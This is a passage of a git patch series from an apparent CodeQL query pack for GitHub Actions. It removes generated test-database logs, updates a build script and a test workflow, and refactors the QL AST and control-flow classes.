"extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" - } - ], - "csharp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip|brotli)$" - } - } - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction.", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "cil" : { - "title" : "Whether to enable CIL extraction.", - "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "javascript" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", - "extractor_options" : { - "skip_types" : { - "title" : "Skip type extraction for TypeScript", - "description" : "Whether to skip the extraction of types in a TypeScript application", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "ruby" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip)$" - } - } - } - } - } - ] - } - } -[2024-02-03 10:17:52] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test -[2024-02-03 10:17:52] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. -[2024-02-03 10:17:52] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . -[2024-02-03 10:17:52] [PROGRESS] database init> Calculated baseline information for languages: (387ms). -[2024-02-03 10:17:52] [PROGRESS] database init> Resolving extractor yaml. -[2024-02-03 10:17:52] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:52] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:52] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. This in-progress database is ready to be populated by an extractor. -[2024-02-03 10:17:52] Plumbing command codeql database init completed. -[2024-02-03 10:17:52] [PROGRESS] database create> Running build command: [] -[2024-02-03 10:17:52] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:52] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. -[2024-02-03 10:17:52] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] -[2024-02-03 10:17:52] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] -[2024-02-03 10:17:53] Plumbing command codeql database trace-command completed. -[2024-02-03 10:17:53] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. -[2024-02-03 10:17:53] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:53] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db... -[2024-02-03 10:17:53] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml -[2024-02-03 10:17:53] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache/version does not exist -[2024-02-03 10:17:53] Tuple pool not found. Clearing relations with cached strings -[2024-02-03 10:17:53] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode clear. -[2024-02-03 10:17:53] Sequence stamp origin is -6222583521912648850 -[2024-02-03 10:17:53] Pausing evaluation to hard-clear memory at sequence stamp o+0 -[2024-02-03 10:17:53] Unpausing evaluation -[2024-02-03 10:17:53] Pausing evaluation to quickly trim disk at sequence stamp o+1 -[2024-02-03 10:17:53] Unpausing evaluation -[2024-02-03 10:17:53] Pausing evaluation to zealously trim disk at sequence stamp o+2 -[2024-02-03 10:17:53] Unpausing evaluation -[2024-02-03 10:17:53] Trimming completed (7ms): Purged everything. -[2024-02-03 10:17:53] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml -[2024-02-03 10:17:53] Found 8 TRAP files (16.41 KiB) -[2024-02-03 10:17:53] [PROGRESS] dataset import> Importing TRAP files -[2024-02-03 10:17:53] Importing changed-files.yml.trap.gz (1 of 8) -[2024-02-03 10:17:53] Importing inter1.yml.trap.gz (2 of 8) -[2024-02-03 10:17:53] Importing no-flow1.yml.trap.gz (3 of 8) -[2024-02-03 10:17:53] Importing no-flow2.yml.trap.gz (4 of 8) -[2024-02-03 10:17:53] Importing simple1.yml.trap.gz (5 of 8) -[2024-02-03 10:17:53] Importing simple2.yml.trap.gz (6 of 8) -[2024-02-03 10:17:53] Importing test.yml.trap.gz (7 of 8) -[2024-02-03 10:17:53] Importing sourceLocationPrefix.trap.gz (8 of 8) -[2024-02-03 10:17:53] [PROGRESS] dataset import> Merging relations -[2024-02-03 10:17:53] Merging 1 fragment for 'files'. -[2024-02-03 10:17:53] Merged 56 bytes for 'files'. -[2024-02-03 10:17:53] Merging 1 fragment for 'folders'. -[2024-02-03 10:17:53] Merged 80 bytes for 'folders'. -[2024-02-03 10:17:53] Merging 1 fragment for 'containerparent'. -[2024-02-03 10:17:53] Merged 128 bytes for 'containerparent'. -[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_scalars'. -[2024-02-03 10:17:53] Merged 3048 bytes (2.98 KiB) for 'yaml_scalars'. -[2024-02-03 10:17:53] Merging 1 fragment for 'yaml'. -[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'yaml'. -[2024-02-03 10:17:53] Merging 1 fragment for 'locations_default'. -[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'locations_default'. -[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_locations'. -[2024-02-03 10:17:53] Merged 2664 bytes (2.60 KiB) for 'yaml_locations'. -[2024-02-03 10:17:53] Merging 1 fragment for 'sourceLocationPrefix'. -[2024-02-03 10:17:53] Merged 4 bytes for 'sourceLocationPrefix'. -[2024-02-03 10:17:53] Saving string and id pools to disk. -[2024-02-03 10:17:54] Finished importing TRAP files. -[2024-02-03 10:17:54] Read 77.48 KiB of uncompressed TRAP data. -[2024-02-03 10:17:54] Relation data size: 21.45 KiB (merge rate: 1.20 MiB/s) -[2024-02-03 10:17:54] String pool size: 2.05 MiB -[2024-02-03 10:17:54] ID pool size: 1.03 MiB -[2024-02-03 10:17:54] [PROGRESS] dataset import> Finished writing database (relations: 21.45 KiB; string pool: 2.05 MiB). -[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+3 -[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:54] Unpausing evaluation -[2024-02-03 10:17:54] Plumbing command codeql dataset import completed. -[2024-02-03 10:17:54] [PROGRESS] database finalize> TRAP import complete (817ms). -[2024-02-03 10:17:54] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... -[2024-02-03 10:17:54] [PROGRESS] database cleanup> TRAP files cleaned up (6ms). -[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up scratch directory... -[2024-02-03 10:17:54] [PROGRESS] database cleanup> Scratch directory cleaned up (0ms). -[2024-02-03 10:17:54] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml -[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml. -[2024-02-03 10:17:54] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode trim. -[2024-02-03 10:17:54] Sequence stamp origin is -6222583518558519910 -[2024-02-03 10:17:54] Pausing evaluation to zealously trim disk at sequence stamp o+0 -[2024-02-03 10:17:54] Unpausing evaluation -[2024-02-03 10:17:54] Trimming completed (2ms): Trimmed disposable data from cache. -[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+1 -[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:54] Unpausing evaluation -[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. -[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml -[2024-02-03 10:17:54] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml (4ms). -[2024-02-03 10:17:54] Plumbing command codeql dataset cleanup completed. -[2024-02-03 10:17:54] Plumbing command codeql database cleanup completed with status 0. -[2024-02-03 10:17:54] [PROGRESS] database finalize> Finished zipping source archive (3.73 KiB). -[2024-02-03 10:17:54] Plumbing command codeql database finalize completed. -[2024-02-03 10:17:54] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. -[2024-02-03 10:17:54] Terminating normally. diff --git a/ql/src/test-db/log/database-index-files-20240203.101752.962.log b/ql/src/test-db/log/database-index-files-20240203.101752.962.log deleted file mode 100644 index f410634a29ff..000000000000 --- a/ql/src/test-db/log/database-index-files-20240203.101752.962.log +++ /dev/null @@ -1,21 +0,0 @@ -[2024-02-03 10:17:52] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:52] Log file was started late. -[2024-02-03 10:17:52] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:52] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:52] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --format=json -[2024-02-03 10:17:53] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] Plumbing command codeql resolve files completed: - [ - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/changed-files.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/inter1.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/test.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow1.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow2.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple1.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple2.yml" - ] -[2024-02-03 10:17:53] [DETAILS] database index-files> Found 7 files. -[2024-02-03 10:17:53] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:53] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] -[2024-02-03 10:17:53] Terminating normally. diff --git a/ql/src/test-db/src.zip b/ql/src/test-db/src.zip deleted file mode 100644 index 9c82ac3a64444a993e3a461dc000184a22d1e3a8..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3816 zcmcImc{r4N8y@S7B{SK=NTkh#nL(1VrA-ZHjHS`3oUF~53^Qa2O^Bj=jVy6c985U& zeHn+5eG6p`2PGa)KF_JzvD?24Noy;#teq+~c`=vh_tIRa?!WW!^|NG ziWLj;R3$WF@PRVmbLC@G8WJxWF2*{5-xFje*R*S{jZdE!ql66TQQ9{;;m$p;g*`U? zCf-^uQULUp%4!G#7t#!jL?f3H3JPDSywe@G3Sk`M`KxcmY65Byc)29G{#GqkqAbEv z_ng;paJl96up=4?$D13oqYYH=$tX04R*c*Yqk$xLHp8l3-mDwm4Uu{KMEcU^u3gX# z!xx#WWf>W7TI-dIB}04f1e(e4t>hI9z8ue)cz6qw6;6Lea%lDGDGZNGtG7AwAL;$d z_%CBH?e2xzWTU{3A2;RQO(K$7&6u6jm%dyH!x!`u;{Dg>`{LVY3IL9DTDgZg^N#94 z*CqE@WSSR{BO3LW9ZYSuXr(_D4YNI>xsX*HNo3EjvRPtlOoI>*=JMeK_F|@4QW#A) zyUM2rb*sJ2f0fL5u3(%Q5_PjAHz+qmGr^lY{2oe?39in9*jVIC0!V8~wQDN^2>ynM zy$2&}R^(CRbS56Lr1de1U%sYC<`E08@P{s~x>3f*T;I|9x)Y47^e!PQGxe_1vm|wi zb4$N_v@O(XE<5{WmIzv1+7Z&i7kB42ZWOGYb3x-%dU93CdT735FUBS2*P-Ps)=2wm zM)50TTmFfn0hpjaDABSoHti&64$R>kVNKRrW;2?|=KbG|vb~(EajfD;$B8>eN*?qce$ue!L(J+@SJcsb!3LQK2&|CQ38rj9$My9!!WL8M7K2DVLhA zSHeZ$_miDJgeu@rV=2`E4`4*6+IZckS!lPs8`^&Ymb827AY2lsEW;u$m@0PgrzWnR z<`F+XIW?JY;M#PU_2B)Kn_@QqY5)GZJsTL}t8nbGkmiaBxiBD;>qx$D`+~238nQ0h zaQ0EJH=L^bL-{6)K6o0m3*?rv^pObUHz{yS3n9NvtUa3fEWg-iQL2NM!zq;v92kgeCd_Oa$Z2Xx)n=E4=#)}}a*w7AZFMEF=}qop6) za0L9AouzYg%1HQ}>K$v5(#jyc`WRW?<9tpn3C!|jR zNaAL1osGGZI}M1W>$WD{Bo8jhChyDekBPhiC92@lAf5TjO5i=@ikX8=lgk2{Heh%O zR9K?BeN>{LbmxgpX+q+|Qt8-QT5dM*%|>*{gy9R>;=xftjm-tdIc2BV; z-O9&+8>eCsiLz~Pq+%>5%y6BYNyKtJ=8$#+>+qZyg zTx01;?Jbr*$VUX>PK}fB5BQ6yN~#qNRQ~GWXXoxo8r(Iryl97ZIn>ujcv3Y6x_x+Y zQA$O=^tA+Q5<2PDlEbaWOc}#$f=L%cu-d>>&o*7j9X>q76n|K#ty|j8I-=^-r@kJX z0=N@eVXe20T1U`mQ=J@m=}$tJwN9xMqL8a@GhqyeZ!XI zei0gIM00*jBIy)G2jAaso_FZtBjf7nw%O>C%zmG|3wqhn+2$sllbcGRB`@jL^EG;J z`n}cVWRV(VXQ#Oi?_=eaJ-O+Y5s7?I# Date: Mon, 5 Feb 2024 10:48:53 +0100 Subject: [PATCH 005/707] Add testproj to gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index e43b0f988953..1233930f4a4f 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,2 @@ .DS_Store +**/*.testproj From 3902a55fbba9a86b3a85113196f3c219f29428ca Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 10:52:17 +0100 Subject: [PATCH 006/707] Update build test db script --- build-dbs.sh | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/build-dbs.sh b/build-dbs.sh index dac4753f4d61..073fcc40b441 100755 --- a/build-dbs.sh +++ b/build-dbs.sh @@ -1,5 +1,5 @@ #!/bin/bash -rm -rf ql/src/test-db || true -rm -rf ql/lib/test-db || true -codeql database create ql/src/test-db -l yaml -s ql/src/test -codeql database create ql/lib/test-db -l yaml -s ql/lib/test +rm -rf ql/src/test/test.testproj || true +rm -rf ql/lib/test/test.testproj || true +codeql database create ql/src/test/test.testproj -l yaml -s ql/src/test +codeql database create ql/lib/test/test.testproj -l yaml -s ql/lib/test From b3eae71f951733ff4a13828d37ed6977c7e92392 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 13:30:46 +0100 Subject: [PATCH 007/707] fix test --- ql/src/test/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/src/test/test.yml b/ql/src/test/test.yml index 8f9cbf3b6440..554a09f21059 100644 --- a/ql/src/test/test.yml +++ b/ql/src/test/test.yml @@ -18,6 +18,7 @@ jobs: - id: step1 env: BODY: ${{ steps.step0.outputs.value}} + shell: powershell run: | Write-Output "::set-output name=MSG::$ENV{BODY}" - id: step2 From 0398fbd0d71cd0b456236c93154d92b07521a939 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 18:04:37 +0100 Subject: [PATCH 008/707] Refactor AST layer --- ql/lib/codeql/actions/Ast.qll | 206 ++++++++---------- .../actions/controlflow/internal/Cfg.qll | 63 +++--- .../codeql/actions/dataflow/FlowSources.qll | 24 +- .../dataflow/internal/DataFlowPrivate.qll | 5 +- 4 files changed, 142 insertions(+), 156 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 967a969a6b72..d2c7fdd45010 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,37 +1,49 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations +/** + * Base class for the AST tree. + * Based on YamlNode from the Yaml library but making mapping values children of the mapping keys: + * eg: top: + * key: value + * According to the Yaml library, both `key` and `value` are direct children of `top` + * This Tree implementation makes `key` child od `top` and `value` child of `key` + */ class AstNode instanceof YamlNode { - AstNode getParentNode() { - if exists(YamlMapping m | m.maps(_, this)) - then exists(YamlMapping m | m.maps(result, this)) - else result = super.getParentNode() - } - - AstNode getAChildNode() { - if this instanceof YamlMapping - then this.(YamlMapping).maps(result, _) - else - if this instanceof YamlCollection - then result = super.getChildNode(_) - else - if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) - then exists(YamlMapping m | m.maps(this, result)) - else none() - } - - AstNode getChildNodeByOrder(int i) { - result = - rank[i](Expression child, Location l | - child = this.getAChildNode() and - child.getLocation() = l - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } - + AstNode getParentNode() { result = super.getParentNode() } + + // AstNode getParentNode() { + // if exists(YamlMapping m | m.maps(_, this)) + // then exists(YamlMapping m | m.maps(result, this)) + // else result = super.getParentNode() + // } + AstNode getAChildNode() { result = super.getAChildNode() } + + // AstNode getAChildNode() { + // if this instanceof YamlMapping + // then this.(YamlMapping).maps(result, _) + // else + // if this instanceof YamlCollection + // then result = super.getChildNode(_) + // else + // if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) + // then exists(YamlMapping m | m.maps(this, result)) + // else none() + // } + // /** + // * This should be getAChildNode(int i) + // */ + // AstNode getChildNodeByOrder(int i) { + // result = + // rank[i](Expression child, Location l | + // child = this.getAChildNode() and + // child.getLocation() = l + // | + // child + // order by + // l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + // ) + // } string toString() { result = super.toString() } string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } @@ -39,15 +51,24 @@ class AstNode instanceof YamlNode { Location getLocation() { result = super.getLocation() } } -class Statement extends AstNode { - // narrow down to something that is a statement - // A statement is a group of expressions and/or statements that you design to carry out a task or an action. - // Any statement that can return a value is automatically qualified to be used as an expression. -} +/** + * A statement is a group of expressions and/or statements that you design to carry out a task or an action. + * Any statement that can return a value is automatically qualified to be used as an expression. + */ +class Statement extends AstNode { } + +/** + * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. + */ +class Expression extends Statement { } + +/** + * A Github Actions Workflow + */ +class WorkflowStmt extends Statement instanceof Actions::Workflow { + JobStmt getAJob() { result = super.getJob(_) } -class Expression extends Statement { - // narrow down to something that is an expression - // An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. + JobStmt getJob(string id) { result = super.getJob(id) } } /** @@ -60,19 +81,17 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } - /** Gets the human-readable name of this job, if any, as a string. */ - string getName() { - result = super.getId() - or - not exists(string s | s = super.getId()) and result = "unknown" - } - /** Gets the step at the given index within this job. */ StepStmt getStep(int index) { result = super.getStep(index) } /** Gets any steps that are defined within this job. */ StepStmt getAStep() { result = super.getStep(_) } + /** + * Gets a needed job. + * eg: + * - needs: [job1, job2] + */ JobStmt getNeededJob() { exists(Actions::Needs needs | needs.getJob() = this and @@ -80,34 +99,35 @@ class JobStmt extends Statement instanceof Actions::Job { ) } - Expression getJobOutputExpr(string varName) { - this.(Actions::Job) - .lookup("outputs") - .(YamlMapping) - .maps(any(YamlScalar a | a.getValue() = varName), result) - } - - JobOutputStmt getJobOutputStmt() { result = this.(Actions::Job).lookup("outputs") } - - Statement getSuccNode(int i) { - result = - rank[i](Expression child, Location l | - (child = this.getAStep() or child = this.getJobOutputStmt()) and - l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } + /** + * Gets the declaration of the outputs for the job. + * eg: + * out1: ${steps.foo.bar} + * out2: ${steps.foo.baz} + */ + JobOutputStmt getOutputStmt() { result = this.(Actions::Job).lookup("outputs") } } +/** + * Declaration of the outputs for the job. + * eg: + * out1: ${steps.foo.bar} + * out2: ${steps.foo.baz} + */ class JobOutputStmt extends Statement instanceof YamlMapping { JobStmt job; JobOutputStmt() { job.(YamlMapping).lookup("outputs") = this } - StepOutputAccessExpr getSuccNode(int i) { result = this.(YamlMapping).getValueNode(i) } + YamlMapping asYamlMapping() { result = this } + + /** + * Gets a specific value expression + * eg: ${steps.foo.bar} + */ + Expression getOutputExpr(string id) { + this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = id), result) + } } /** @@ -116,15 +136,7 @@ class JobOutputStmt extends Statement instanceof YamlMapping { class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } - string getName() { - result = super.getId() - or - not exists(string s | s = super.getId()) and result = "unknown" - } - JobStmt getJob() { result = super.getJob() } - - abstract AstNode getSuccNode(int i); } /** @@ -145,44 +157,12 @@ class UsesExpr extends StepStmt, Expression { result = with.lookup(key) ) } - - Expression getArgumentByOrder(int i) { - exists(Actions::With with | - with.getStep() = uses.getStep() and - result = - rank[i](Expression child, Location l | - child = with.lookup(_) and l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - ) - } - - Expression getAnArgument() { - exists(Actions::With with | - with.getStep() = this and - result = with.lookup(_) - ) - } - - override AstNode getSuccNode(int i) { result = this.getArgumentByOrder(i) } } /** - * An argument passed to a UsesExpr. + * A Run step represents the evaluation of a provided script */ -class ArgumentExpr extends Expression { - UsesExpr uses; - - ArgumentExpr() { this = uses.getAnArgument() } -} - -/** - * A Run step represents a call to an inline script or executable on the runner machine. - */ -class RunExpr extends StepStmt { +class RunExpr extends StepStmt, Expression { Actions::Run scriptExpr; RunExpr() { scriptExpr.getStep() = this } @@ -190,12 +170,10 @@ class RunExpr extends StepStmt { Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } - - override AstNode getSuccNode(int i) { result = this.getScriptExpr() and i = 0 } } /** - * A YAML string containing a workflow expression. + * Evaluation of a workflow expression ${{}}. */ class ExprAccessExpr extends Expression instanceof YamlString { string expr; @@ -208,7 +186,7 @@ class ExprAccessExpr extends Expression instanceof YamlString { } /** - * A ExprAccessExpr where the expression references a step output. + * A ExprAccessExpr where the expression evaluated is a step output read. * eg: `${{ steps.changed-files.outputs.all_changed_files }}` */ class StepOutputAccessExpr extends ExprAccessExpr { @@ -230,7 +208,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { } /** - * A ExprAccessExpr where the expression references a job output. + * A ExprAccessExpr where the expression evaluated is a job output read. * eg: `${{ needs.job1.outputs.foo}}` */ class JobOutputAccessExpr extends ExprAccessExpr { @@ -250,7 +228,7 @@ class JobOutputAccessExpr extends ExprAccessExpr { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getJobOutputExpr(varName) = result + job.getOutputStmt().getOutputExpr(varName) = result ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8b6696fe777c..c549eb401980 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -139,31 +139,40 @@ private import CfgImpl private import Completion private import CfgScope -// Trees are what end up creating Cfg::Node objects and therefore DataFlow::Node objects. -// Its also required that there is parent/child relationships between nodes so orphans nodes will not appear as either Cfg::Node or DataFlow::Node. -// For example -// - ArgumentExpr should be children of UsesExpr, and UsesExpr should be children of StepStmt. -// TODO: We need to make VarAccess expressions part ot the tree as they are currently orphans -private class CfgNodeTree extends StandardPreOrderTree instanceof AstNode { - override AstNode getChildNode(int i) { result = super.getChildNodeByOrder(i) } +private class JobTree extends StandardPreOrderTree instanceof JobStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + (child = super.getAStep() or child = super.getOutputStmt()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { + override ControlFlowTree getChildNode(int i) { result = super.asYamlMapping().getValueNode(i) } +} + +private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getArgument(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class RunTree extends StandardPreOrderTree instanceof RunExpr { + override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } } -// private class JobStmtTree extends StandardPreOrderTree instanceof JobStmt { -// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } -// } -// -// private class StepStmtTree extends StandardPreOrderTree instanceof StepStmt { -// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } -// } -// -// private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { -// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } -// } -// -// // TODO: Do we need this or we can just care about the ExprAccessExpr -// private class ArgumentTree extends LeafTree instanceof ArgumentExpr { } -// -// private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } -// -// private class StepOutputAccessTree extends LeafTree instanceof 